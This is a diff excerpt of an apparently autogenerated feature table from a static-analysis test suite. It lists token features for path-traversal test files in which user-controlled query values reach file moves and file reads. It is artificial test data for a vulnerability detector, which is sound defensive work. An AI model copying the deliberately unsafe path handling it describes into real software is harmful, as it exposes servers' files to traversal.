fileImports | express express-fileupload | | autogenerated/TaintedPath/express.js:7:23:9:1 | functio ... bar);\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/express.js:7:23:9:1 | functio ... bar);\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/express.js:7:23:9:1 | functio ... bar);\\n} | calleeImports | express | @@ -6985,6 +67046,81 @@ tokenFeatures | autogenerated/TaintedPath/express.js:7:23:9:1 | functio ... bar);\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/express.js:7:23:9:1 | functio ... bar);\\n} | fileImports | express express-fileupload | | autogenerated/TaintedPath/express.js:7:23:9:1 | functio ... bar);\\n} | receiverName | app | +| autogenerated/TaintedPath/express.js:7:23:9:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:7:23:9:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:7:23:9:1 | return of anonymous function | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:7:23:9:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:7:23:9:1 | return of anonymous function | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:7:33:7:35 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:7:33:7:35 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:7:33:7:35 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:7:33:7:35 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/express.js:7:33:7:35 | req | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:7:33:7:35 | req | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:7:33:7:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:7:33:7:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:7:33:7:35 | req | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:7:33:7:35 | req | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:7:38:7:40 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:7:38:7:40 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/express.js:7:38:7:40 | res | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:7:38:7:40 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:7:38:7:40 | res | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:8:3:8:5 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:8:3:8:5 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/express.js:8:3:8:5 | req | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:8:3:8:5 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:8:3:8:5 | req | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:8:3:8:11 | req.files | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:8:3:8:11 | req.files | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/express.js:8:3:8:11 | req.files | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:8:3:8:11 | req.files | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:8:3:8:11 | req.files | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:8:3:8:15 | req.files.foo | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:8:3:8:15 | req.files.foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/express.js:8:3:8:15 | req.files.foo | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:8:3:8:15 | req.files.foo | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:8:3:8:15 | req.files.foo | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:8:3:8:18 | req.files.foo.mv | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:8:3:8:18 | req.files.foo.mv | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/express.js:8:3:8:18 | req.files.foo.mv | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:8:3:8:18 | req.files.foo.mv | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:8:3:8:18 | req.files.foo.mv | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:8:3:8:33 | exceptional return of req.fil ... ry.bar) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:8:3:8:33 | exceptional return of req.fil ... ry.bar) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/express.js:8:3:8:33 | exceptional return of req.fil ... ry.bar) | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:8:3:8:33 | exceptional return of req.fil ... ry.bar) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:8:3:8:33 | exceptional return of req.fil ... ry.bar) | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:8:3:8:33 | req.fil ... ry.bar) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:8:3:8:33 | req.fil ... ry.bar) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/express.js:8:3:8:33 | req.fil ... ry.bar) | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:8:3:8:33 | req.fil ... ry.bar) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:8:3:8:33 | req.fil ... ry.bar) | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:8:7:8:11 | files | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:8:7:8:11 | files | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/express.js:8:7:8:11 | files | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:8:7:8:11 | files | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:8:7:8:11 | files | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:8:13:8:15 | foo | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:8:13:8:15 | foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/express.js:8:13:8:15 | foo | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:8:13:8:15 | foo | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:8:13:8:15 | foo | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:8:17:8:18 | mv | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:8:17:8:18 | mv | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/express.js:8:17:8:18 | mv | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:8:17:8:18 | mv | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:8:17:8:18 | mv | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:8:20:8:22 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:8:20:8:22 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/express.js:8:20:8:22 | req | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:8:20:8:22 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:8:20:8:22 | req | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:8:20:8:28 | req.query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:8:20:8:28 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/express.js:8:20:8:28 | req.query | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:8:20:8:28 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:8:20:8:28 | req.query | fileImports | express express-fileupload | | autogenerated/TaintedPath/express.js:8:20:8:32 | req.query.bar | CalleeFlexibleAccessPath | req.files.foo.mv | | autogenerated/TaintedPath/express.js:8:20:8:32 | req.query.bar | InputArgumentIndex | 0 | | autogenerated/TaintedPath/express.js:8:20:8:32 | req.query.bar | contextFunctionInterfaces | | @@ -6992,24 +67128,205 @@ tokenFeatures | autogenerated/TaintedPath/express.js:8:20:8:32 | req.query.bar | enclosingFunctionBody | req res req files foo mv req query bar | | autogenerated/TaintedPath/express.js:8:20:8:32 | req.query.bar | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/express.js:8:20:8:32 | req.query.bar | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:8:24:8:28 | query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:8:24:8:28 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/express.js:8:24:8:28 | query | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:8:24:8:28 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:8:24:8:28 | query | fileImports | express express-fileupload | +| autogenerated/TaintedPath/express.js:8:30:8:32 | bar | contextFunctionInterfaces | | +| autogenerated/TaintedPath/express.js:8:30:8:32 | bar | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/express.js:8:30:8:32 | bar | enclosingFunctionBody | req res req files foo mv req query bar | +| autogenerated/TaintedPath/express.js:8:30:8:32 | bar | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/express.js:8:30:8:32 | bar | fileImports | express express-fileupload | +| autogenerated/TaintedPath/handlebars.js:1:1:1:0 | this | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:1:1:1:0 | this | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:1:1:1:1 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:1:1:1:1 | data | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:1:1:1:1 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:1:1:1:1 | fs | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:1:1:1:1 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:1:1:1:1 | fs | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:1:1:1:1 | hb | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:1:1:1:1 | hb | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:1:1:1:1 | hb | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:1:1:1:1 | require | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:1:1:1:1 | require | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:1:7:1:13 | express | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:1:7:1:13 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:1:7:1:13 | express | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:1:7:1:34 | express | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:1:7:1:34 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:1:7:1:34 | express | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:1:7:1:34 | express ... press') | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:1:7:1:34 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:1:7:1:34 | express ... press') | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:1:17:1:23 | require | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:1:17:1:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:1:17:1:23 | require | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:1:17:1:34 | exceptional return of require('express') | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:1:17:1:34 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:1:17:1:34 | exceptional return of require('express') | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:1:17:1:34 | require('express') | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:1:17:1:34 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:1:17:1:34 | require('express') | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:1:25:1:33 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/handlebars.js:1:25:1:33 | 'express' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:1:25:1:33 | 'express' | calleeImports | | | autogenerated/TaintedPath/handlebars.js:1:25:1:33 | 'express' | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | | autogenerated/TaintedPath/handlebars.js:1:25:1:33 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/handlebars.js:1:25:1:33 | 'express' | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:2:7:2:8 | hb | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:2:7:2:8 | hb | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:2:7:2:8 | hb | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:2:7:2:8 | hb | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:2:7:2:32 | hb | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:2:7:2:32 | hb | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:2:7:2:32 | hb | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:2:7:2:32 | hb = re ... ebars") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:2:7:2:32 | hb = re ... ebars") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:2:7:2:32 | hb = re ... ebars") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:2:12:2:18 | require | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:2:12:2:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:2:12:2:18 | require | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:2:12:2:32 | exceptional return of require ... ebars") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:2:12:2:32 | exceptional return of require ... ebars") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:2:12:2:32 | exceptional return of require ... ebars") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:2:12:2:32 | require ... ebars") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:2:12:2:32 | require ... ebars") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:2:12:2:32 | require ... ebars") | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:2:20:2:31 | "handlebars" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/handlebars.js:2:20:2:31 | "handlebars" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:2:20:2:31 | "handlebars" | calleeImports | | | autogenerated/TaintedPath/handlebars.js:2:20:2:31 | "handlebars" | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | | autogenerated/TaintedPath/handlebars.js:2:20:2:31 | "handlebars" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/handlebars.js:2:20:2:31 | "handlebars" | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:3:7:3:8 | fs | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:3:7:3:8 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:3:7:3:8 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:3:7:3:8 | fs | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:3:7:3:24 | fs | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:3:7:3:24 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:3:7:3:24 | fs | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:3:7:3:24 | fs = require("fs") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:3:7:3:24 | fs = require("fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:3:7:3:24 | fs = require("fs") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:3:12:3:18 | require | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:3:12:3:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:3:12:3:18 | require | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:3:12:3:24 | exceptional return of require("fs") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:3:12:3:24 | exceptional return of require("fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:3:12:3:24 | exceptional return of require("fs") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:3:12:3:24 | require("fs") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:3:12:3:24 | require("fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:3:12:3:24 | require("fs") | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:3:20:3:23 | "fs" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/handlebars.js:3:20:3:23 | "fs" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:3:20:3:23 | "fs" | calleeImports | | | autogenerated/TaintedPath/handlebars.js:3:20:3:23 | "fs" | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | | autogenerated/TaintedPath/handlebars.js:3:20:3:23 | "fs" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/handlebars.js:3:20:3:23 | "fs" | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:5:7:5:9 | app | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:5:7:5:9 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:5:7:5:9 | app | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:5:7:5:21 | app | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:5:7:5:21 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:5:7:5:21 | app | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:5:7:5:21 | app = express() | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:5:7:5:21 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:5:7:5:21 | app = express() | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:5:13:5:19 | express | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:5:13:5:19 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:5:13:5:19 | express | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:5:13:5:21 | exceptional return of express() | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:5:13:5:21 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:5:13:5:21 | exceptional return of express() | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:5:13:5:21 | express() | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:5:13:5:21 | express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:5:13:5:21 | express() | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:7:7:7:10 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:7:7:7:10 | data | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:7:7:7:10 | data | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:7:7:7:10 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:7:7:7:15 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:7:7:7:15 | data | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:7:7:7:15 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:7:7:7:15 | data = {} | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:7:7:7:15 | data = {} | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:7:7:7:15 | data = {} | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:7:14:7:15 | {} | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:7:14:7:15 | {} | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:7:14:7:15 | {} | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | data | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | data | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | data | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | fs | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | fs | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | fs | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | fs | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | hb | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | hb | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | hb | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | hb | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | hb | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | this | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | this | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | this | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:9:1:9:0 | this | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | 'arguments' object of function init | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | 'arguments' object of function init | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | 'arguments' object of function init | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | 'arguments' object of function init | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | 'arguments' object of function init | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | exceptional return of function init | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | exceptional return of function init | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | exceptional return of function init | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | exceptional return of function init | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | exceptional return of function init | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | functio ... }}");\\n} | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | functio ... }}");\\n} | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | functio ... }}");\\n} | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:9:1:24:1 | return of function init | 